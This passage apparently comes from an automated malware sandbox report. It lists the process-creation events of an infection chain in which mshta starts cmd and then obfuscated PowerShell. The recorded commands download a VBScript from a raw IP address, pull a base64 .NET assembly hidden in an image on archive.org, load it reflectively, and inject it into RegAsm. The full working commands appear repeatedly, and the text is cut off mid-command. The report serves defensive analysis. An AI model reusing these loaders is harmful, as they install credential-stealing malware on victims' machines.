mljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyI='+[Char]0x22+'))')))"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwerSHELl -EX bYPAsS -Nop -w 1 -C DEvIceCReDEntIaldePlOyMeNT.Exe ; ieX($(IeX('[SYSTEm.texT.ENCODING]'+[CHaR]0x3A+[cHAR]0x3A+'uTf8.gETstrInG([systEm.CoNVErT]'+[ChAr]0X3a+[Char]58+'FRomBaSe64stRINg('+[CHaR]0x22+'JGggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYkVyREVGaU5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT24uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFN5YVRSeixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsc3hnWUwsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY1osdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdlUUNNeVlxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHYpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ5VE1FIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEYWZ5RlprcVNaICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRoOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMzguMjQwLjQ0LjkvNTkwL25pY2VmZWF0dXJlc3dvcmtpbmdncmVhdC5UaWYiLCIkZU52OkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyIsMCwwKTtzVEFyVC1TTGVFcCgzKTtTdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyI='+[Char]0x22+'))')))"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nnmswnbn\nnmswnbn.cmdline"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nicefeaturesworkinggreat.vbS" Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES781D.tmp" "c:\Users\user\AppData\Local\Temp\nnmswnbn\CSC2F3646BAED0D4162AB721EA9AB40E2EA.TMP"Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggKFtzdFJpbkddJFZlckJPU0VwckVGRVJlTkNFKVsxLDNdKydYJy1qT2luJycpICgoKCd7MH1pbWFnZVVybCAnKyc9IHsxfWh0dHBzOi8vaScrJ2E2MDAxMDIudXMuYXJjaGl2ZS5vcmcvMzIvaXRlbXMvZGV0YWgtbm90JysnZS12XzIwMjQxMC9EZXRhaE5vdGVfVi5qcGcgezF9O3swfXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGUnKydtLk5ldC5XZWJDbGllbnQ7ezB9aW1hZ2VCJysneScrJ3RlcyA9IHswfXdlYkNsaWVudC5Eb3dubG9hZERhdGEoezB9aW1hZycrJ2VVcmwpO3swfWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCcrJ3swfWltYWdlQnl0ZXMpO3swfXN0YXJ0RmxhZyA9IHsxfTw8QkFTRTY0X1NUQVJUJysnPj57MX07ezB9ZW5kRmxhZyA9IHsxfTw8QkFTRScrJzY0X0VORD4+ezF9O3swfXN0YXJ0SW5kZXggPSAnKyd7MH1pbWFnZVRleHQuSW5kZXhPZih7MH1zdGFydEZsYWcpO3swfWVuZEluZGV4ID0gezB9aW1hZ2VUZXh0LkluZGV4T2YoezB9ZW5kRicrJ2xhZyk7ezB9c3RhcnRJJysnbmRleCAtZ2UgMCAtYW5kIHswfWVuZEluZGV4IC0nKydndCB7MH1zdGFydEluJysnZGV4O3swfXN0YXJ0SW5kZXggKz0gezB9c3RhJysncnRGbGFnLkxlbmd0aDt7MH1iYXNlNjRMZW5ndGgnKycgPSB7MCcrJ31lbmRJbmRleCAtJysnIHswfXN0YXJ0SW4nKydkZXg7ezB9YmFzZTY0Q29tbWFuZCA9IHswfWltJysnYWdlVGV4dC5TdWJzdHJpbmcoezB9c3RhcnRJbmRleCwgezB9YmFzZTY0TGVuZ3RoKTt7MH1jb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaScrJ25nKHswfWJhc2U2NENvbW1hbmQpO3swJysnfWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SJysnZWZsZWN0aW9uLkFzc2VtYicrJ2x5XTo6TG9hZCh7JysnMH1jb21tYW5kQnl0ZXMpO3swfXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoeycrJzF9VkFJezF9KTt7MH12YWknKydNZXRob2QuSW52b2tlKHswfW51bGwsIEAoezF9dHh0LkRSUlNSUi8wOTUvOS40NC4wNDIuODMvLzpwdHRoezF9LCB7MX1kZXNhdGl2YWRvezF9LCB7MX1kZXNhdGl2YWRveycrJzF9LCB7MX1kZXNhdGl2YWRvezF9LCB7MX1SZWdBc217MX0sIHsxfWRlc2F0aXZhZG97MX0sIHsxfWQnKydlc2F0aXZhZG8nKyd7MX0pKTsnKSAgLUYgIFtDSEFyXTM2LFtDSEFyXTM5KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([stRinG]$VerBOSEprEFEReNCE)[1,3]+'X'-jOin'') ((('{0}imageUrl '+'= {1}https://i'+'a600102.us.archive.org/32/items/detah-not'+'e-v_202410/DetahNote_V.jpg {1};{0}webClient = New-Object Syste'+'m.Net.WebClient;{0}imageB'+'y'+'tes = {0}webClient.DownloadData({0}imag'+'eUrl);{0}imageText = [System.Text.Encoding]::UTF8.GetString('+'{0}imageBytes);{0}startFlag = {1}<<BASE64_START'+'>>{1};{0}endFlag = {1}<<BASE'+'64_END>>{1};{0}startIndex = '+'{0}imageText.IndexOf({0}startFlag);{0}endIndex = {0}imageText.IndexOf({0}endF'+'lag);{0}startI'+'ndex -ge 0 -and {0}endIndex -'+'gt {0}startIn'+'dex;{0}startIndex += {0}sta'+'rtFlag.Length;{0}base64Length'+' = {0'+'}endIndex -'+' {0}startIn'+'dex;{0}base64Command = {0}im'+'ageText.Substring({0}startIndex, {0}base64Length);{0}commandBytes = [System.Convert]::FromBase64Stri'+'ng({0}base64Command);{0'+'}loadedAssembly = [System.R'+'eflection.Assemb'+'ly]::Load({'+'0}commandBytes);{0}vaiMethod = [dnlib.IO.Home].GetMethod({'+'1}VAI{1});{0}vai'+'Method.Invoke({0}null, @({1}txt.DRRSRR/095/9.44.042.83//:ptth{1}, {1}desativado{1}, {1}desativado{'+'1}, {1}desativado{1}, {1}RegAsm{1}, {1}desativado{1}, {1}d'+'esativado'+'{1}));') -F [CHAr]36,[CHAr]39) )"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwerSHELl -EX bYPAsS -Nop -w 1 -C DEvIceCReDEntIaldePlOyMeNT.Exe ; ieX($(IeX('[SYSTEm.texT.ENCODING]'+[CHaR]0x3A+[cHAR]0x3A+'uTf8.gETstrInG([systEm.CoNVErT]'+[ChAr]0X3a+[Char]58+'FRomBaSe64stRINg('+[CHaR]0x22+'JGggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYkVyREVGaU5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT24uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFN5YVRSeixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsc3hnWUwsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY1osdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdlUUNNeVlxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHYpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ5VE1FIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEYWZ5RlprcVNaICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRoOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMzguMjQwLjQ0LjkvNTkwL25pY2VmZWF0dXJlc3dvcmtpbmdncmVhdC5UaWYiLCIkZU52OkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyIsMCwwKTtzVEFyVC1TTGVFcCgzKTtTdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyI='+[Char]0x22+'))')))"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwerSHELl -EX bYPAsS -Nop -w 1 -C DEvIceCReDEntIaldePlOyMeNT.Exe ; ieX($(IeX('[SYSTEm.texT.ENCODING]'+[CHaR]0x3A+[cHAR]0x3A+'uTf8.gETstrInG([systEm.CoNVErT]'+[ChAr]0X3a+[Char]58+'FRomBaSe64stRINg('+[CHaR]0x22+'JGggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYkVyREVGaU5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT24uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFN5YVRSeixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsc3hnWUwsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY1osdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdlUUNNeVlxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHYpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ5VE1FIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEYWZ5RlprcVNaICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRoOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMzguMjQwLjQ0LjkvNTkwL25pY2VmZWF0dXJlc3dvcmtpbmdncmVhdC5UaWYiLCIkZU52OkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyIsMCwwKTtzVEFyVC1TTGVFcCgzKTtTdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyI='+[Char]0x22+'))')))"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\op4j5mgw\op4j5mgw.cmdline"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nicefeaturesworkinggreat.vbS"
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB635.tmp" "c:\Users\user\AppData\Local\Temp\op4j5mgw\CSC61FD86854EBB47F380D5789CC9CFF7A.TMP"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\rqgexaaqlwosdbspgszm"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\tkloyslrzegxfpgbpcmonko"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\emrhylvlvnykqvcfgfgpxwbgnd"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggKFtzdFJpbkddJFZlckJPU0VwckVGRVJlTkNFKVsxLDNdKydYJy1qT2luJycpICgoKCd7MH1pbWFnZVVybCAnKyc9IHsxfWh0dHBzOi8vaScrJ2E2MDAxMDIudXMuYXJjaGl2ZS5vcmcvMzIvaXRlbXMvZGV0YWgtbm90JysnZS12XzIwMjQxMC9EZXRhaE5vdGVfVi5qcGcgezF9O3swfXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGUnKydtLk5ldC5XZWJDbGllbnQ7ezB9aW1hZ2VCJysneScrJ3RlcyA9IHswfXdlYkNsaWVudC5Eb3dubG9hZERhdGEoezB9aW1hZycrJ2VVcmwpO3swfWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCcrJ3swfWltYWdlQnl0ZXMpO3swfXN0YXJ0RmxhZyA9IHsxfTw8QkFTRTY0X1NUQVJUJysnPj57MX07ezB9ZW5kRmxhZyA9IHsxfTw8QkFTRScrJzY0X0VORD4+ezF9O3swfXN0YXJ0SW5kZXggPSAnKyd7MH1pbWFnZVRleHQuSW5kZXhPZih7MH1zdGFydEZsYWcpO3swfWVuZEluZGV4ID0gezB9aW1hZ2VUZXh0LkluZGV4T2YoezB9ZW5kRicrJ2xhZyk7ezB9c3RhcnRJJysnbmRleCAtZ2UgMCAtYW5kIHswfWVuZEluZGV4IC0nKydndCB7MH1zdGFydEluJysnZGV4O3swfXN0YXJ0SW5kZXggKz0gezB9c3RhJysncnRGbGFnLkxlbmd0aDt7MH1iYXNlNjRMZW5ndGgnKycgPSB7MCcrJ31lbmRJbmRleCAtJysnIHswfXN0YXJ0SW4nKydkZXg7ezB9YmFzZTY0Q29tbWFuZCA9IHswfWltJysnYWdlVGV4dC5TdWJzdHJpbmcoezB9c3RhcnRJbmRleCwgezB9YmFzZTY0TGVuZ3RoKTt7MH1jb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaScrJ25nKHswfWJhc2U2NENvbW1hbmQpO3swJysnfWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SJysnZWZsZWN0aW9uLkFzc2VtYicrJ2x5XTo6TG9hZCh7JysnMH1jb21tYW5kQnl0ZXMpO3swfXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoeycrJzF9VkFJezF9KTt7MH12YWknKydNZXRob2QuSW52b2tlKHswfW51bGwsIEAoezF9dHh0LkRSUlNSUi8wOTUvOS40NC4wNDIuODMvLzpwdHRoezF9LCB7MX1kZXNhdGl2YWRvezF9LCB7MX1kZXNhdGl2YWRveycrJzF9LCB7MX1kZXNhdGl2YWRvezF9LCB7MX1SZWdBc217MX0sIHsxfWRlc2F0aXZhZG97MX0sIHsxfWQnKydlc2F0aXZhZG8nKyd7MX0pKTsnKSAgLUYgIFtDSEFyXTM2LFtDSEFyXTM5KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([stRinG]$VerBOSEprEFEReNCE)[1,3]+'X'-jOin'') ((('{0}imageUrl '+'= {1}https://i'+'a600102.us.archive.org/32/items/detah-not'+'e-v_202410/DetahNote_V.jpg {1};{0}webClient = New-Object Syste'+'m.Net.WebClient;{0}imageB'+'y'+'tes = {0}webClient.DownloadData({0}imag'+'eUrl);{0}imageText = [System.Text.Encoding]::UTF8.GetString('+'{0}imageBytes);{0}startFlag = {1}<<BASE64_START'+'>>{1};{0}endFlag = {1}<<BASE'+'64_END>>{1};{0}startIndex = '+'{0}imageText.IndexOf({0}startFlag);{0}endIndex = {0}imageText.IndexOf({0}endF'+'lag);{0}startI'+'ndex -ge 0 -and {0}endIndex -'+'gt {0}startIn'+'dex;{0}startIndex += {0}sta'+'rtFlag.Length;{0}base64Length'+' = {0'+'}endIndex -'+' {0}startIn'+'dex;{0}base64Command = {0}im'+'ageText.Substring({0}startIndex, {0}base64Length);{0}commandBytes = [System.Convert]::FromBase64Stri'+'ng({0}base64Command);{0'+'}loadedAssembly = [System.R'+'eflection.Assemb'+'ly]::Load({'+'0}commandBytes);{0}vaiMethod = [dnlib.IO.Home].GetMethod({'+'1}VAI{1});{0}vai'+'Method.Invoke({0}null, @({1}txt.DRRSRR/095/9.44.042.83//:ptth{1}, {1}desativado{1}, {1}desativado{'+'1}, {1}desativado{1}, {1}RegAsm{1}, {1}desativado{1}, {1}d'+'esativado'+'{1}));') -F [CHAr]36,[CHAr]39) )"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]0x22+'jgggicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagqwrelxrzcgugicagicagicagicagicagicagicagicagicagicagicattwvtykvyrevgau5pdglpbiagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcjvckxnt24uzexsiiwgicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagzfn5yvrseixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbsc3hnwuwsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagy1osdwludcagicagicagicagicagicagicagicagicagicagicagihdluunnevlxleludfb0ciagicagicagicagicagicagicagicagicagicagicagihypoycgicagicagicagicagicagicagicagicagicagicagicatbmfnzsagicagicagicagicagicagicagicagicagicagicagicj5ve1fiiagicagicagicagicagicagicagicagicagicagicagic1oyu1fu3bby0ugicagicagicagicagicagicagicagicagicagicagicbeywz5rlprcvnaicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicroojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmzgumjqwljq0ljkvntkwl25py2vmzwf0dxjlc3dvcmtpbmdncmvhdc5uawyilcikzu52okfquerbvefcbmljzwzlyxr1cmvzd29ya2luz2dyzwf0lnziuyismcwwkttzvefyvc1ttgvfccgzktttdefsvcagicagicagicagicagicagicagicagicagicagicagicikzu5wokfquerbvefcbmljzwzlyxr1cmvzd29ya2luz2dyzwf0lnziuyi='+[char]0x22+'))')))"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]0x22+'jgggicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagqwrelxrzcgugicagicagicagicagicagicagicagicagicagicagicattwvtykvyrevgau5pdglpbiagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcjvckxnt24uzexsiiwgicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagzfn5yvrseixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbsc3hnwuwsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagy1osdwludcagicagicagicagicagicagicagicagicagicagicagihdluunnevlxleludfb0ciagicagicagicagicagicagicagicagicagicagicagihypoycgicagicagicagicagicagicagicagicagicagicagicatbmfnzsagicagicagicagicagicagicagicagicagicagicagicj5ve1fiiagicagicagicagicagicagicagicagicagicagicagic1oyu1fu3bby0ugicagicagicagicagicagicagicagicagicagicagicbeywz5rlprcvnaicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicroojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmzgumjqwljq0ljkvntkwl25py2vmzwf0dxjlc3dvcmtpbmdncmvhdc5uawyilcikzu52okfquerbvefcbmljzwzlyxr1cmvzd29ya2luz2dyzwf0lnziuyismcwwkttzvefyvc1ttgvfccgzktttdefsvcagicagicagicagicagicagicagicagicagicagicagicikzu5wokfquerbvefcbmljzwzlyxr1cmvzd29ya2luz2dyzwf0lnziuyi='+[char]0x22+'))')))"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'liggkftzdfjpbkddjfzlckjpu0vwckvgrvjltknfkvsxldndkydyjy1qt2lujycpicgokcd7mh1pbwfnzvvybcankyc9ihsxfwh0dhbzoi8vascrj2e2mdaxmdiudxmuyxjjagl2zs5vcmcvmzivaxrlbxmvzgv0ywgtbm90jysnzs12xziwmjqxmc9ezxrhae5vdgvfvi5qcgcgezf9o3swfxdlyknsawvudca9ie5ldy1pymply3qgu3lzdgunkydtlk5ldc5xzwjdbgllbnq7ezb9aw1hz2vcjysnescrj3rlcya9ihswfxdlyknsawvudc5eb3dubg9hzerhdgeoezb9aw1hzycrj2vvcmwpo3swfwltywdlvgv4dca9ifttexn0zw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkccrj3swfwltywdlqnl0zxmpo3swfxn0yxj0rmxhzya9ihsxftw8qkftrty0x1nuqvjujysnpj57mx07ezb9zw5krmxhzya9ihsxftw8qkftrscrjzy0x0vord4+ezf9o3swfxn0yxj0sw5kzxggpsankyd7mh1pbwfnzvrlehqusw5kzxhpzih7mh1zdgfydezsywcpo3swfwvuzeluzgv4id0gezb9aw1hz2vuzxh0lkluzgv4t2yoezb9zw5kricrj2xhzyk7ezb9c3rhcnrjjysnbmrlecatz2ugmcatyw5kihswfwvuzeluzgv4ic0nkydndcb7mh1zdgfydelujysnzgv4o3swfxn0yxj0sw5kzxggkz0gezb9c3rhjysncnrgbgfnlkxlbmd0adt7mh1iyxnlnjrmzw5ndggnkycgpsb7mccrj31lbmrjbmrlecatjysnihswfxn0yxj0sw4nkydkzxg7ezb9ymfzzty0q29tbwfuzca9ihswfwltjysnywdlvgv4dc5tdwjzdhjpbmcoezb9c3rhcnrjbmrlecwgezb9ymfzzty0tgvuz3roktt7mh1jb21tyw5kqnl0zxmgpsbbu3lzdgvtlknvbnzlcnrdojpgcm9tqmfzzty0u3ryascrj25nkhswfwjhc2u2nenvbw1hbmqpo3swjysnfwxvywrlzefzc2vtymx5id0gw1n5c3rlbs5sjysnzwzszwn0aw9ulkfzc2vtyicrj2x5xto6tg9hzch7jysnmh1jb21tyw5kqnl0zxmpo3swfxzhau1ldghvzca9iftkbmxpyi5jty5ib21lxs5hzxrnzxrob2qoeycrjzf9vkfjezf9ktt7mh12ywknkydnzxrob2qusw52b2tlkhswfw51bgwsieaoezf9dhh0lkrsulnsui8wotuvos40nc4wndiuodmvlzpwdhroezf9lcb7mx1kzxnhdgl2ywrvezf9lcb7mx1kzxnhdgl2ywrveycrjzf9lcb7mx1kzxnhdgl2ywrvezf9lcb7mx1szwdbc217mx0sihsxfwrlc2f0axzhzg97mx0sihsxfwqnkydlc2f0axzhzg8nkyd7mx0pktsnksagluygiftdsefyxtm2lftdsefyxtm5ksap';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ".( ([string]$verbosepreference)[1,3]+'x'-join'') ((('{0}imageurl '+'= {1}https://i'+'a600102.us.archive.org/32/items/detah-not'+'e-v_202410/detahnote_v.jpg {1};{0}webclient = new-object syste'+'m.net.webclient;{0}imageb'+'y'+'tes = {0}webclient.downloaddata({0}imag'+'eurl);{0}imagetext = [system.text.encoding]::utf8.getstring('+'{0}imagebytes);{0}startflag = {1}<<base64_start'+'>>{1};{0}endflag = 